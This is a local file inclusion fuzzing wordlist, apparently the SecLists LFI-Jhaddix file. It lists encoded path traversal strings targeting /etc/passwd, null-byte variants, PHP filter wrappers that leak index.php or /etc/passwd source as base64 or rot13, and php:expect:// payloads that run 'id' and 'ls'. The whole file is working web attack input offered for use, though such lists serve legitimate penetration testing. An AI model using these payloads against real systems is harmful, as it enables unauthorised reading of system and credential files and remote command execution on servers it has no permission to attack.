https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt
http://google.com/
etc/passwd
etc/passwd%00
../../etc/passwd
../../../../../etc/passwd
%252e%252e%252f
....//....//etc/passwd
php://filter/read=string.rot13/resource=index.php
php://filter/convert.base64-encode/resource=index.php
pHp://FilTer/convert.base64-encode/resource=index.php
php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
php:expect://id
php:expect://ls
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%252e%252e%252f%252e%252e%252fetc%252fpassword
....//....//....//etc/passwd
....\/....\/....\/etc/passwd
%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
../../../etc/passwd%00
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
....//....//etc/passwd
..///////..////..//////etc/passwd
/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
/var/www/../../etc/passwd
php://filter/read=string.toupper|string.rot13|string.tolower/resource=file:///etc/passwd
php://filter/string.toupper/string.rot13/string.tolower/resource=file:///etc/passwd
php://filter/convert.base64-decode/resource=data://plain/text,aGVsbG8=
php://filter/convert.base64-encode|convert.base64-decode/resource=file:///etc/passwd
php://filter/convert.quoted-printable-encode/resource=data://plain/text,£hellooo=
php://filter/convert.iconv.utf-8.utf-16le/resource=data://plain/text,trololohellooo=
/etc/passwd%2500
/etc/passwd.................................................................................
../../../../../../../../../../../../../../../../../../../../etc/passwd
/etc/passwd/../../../../../../../../../../../../../../../../../../../..
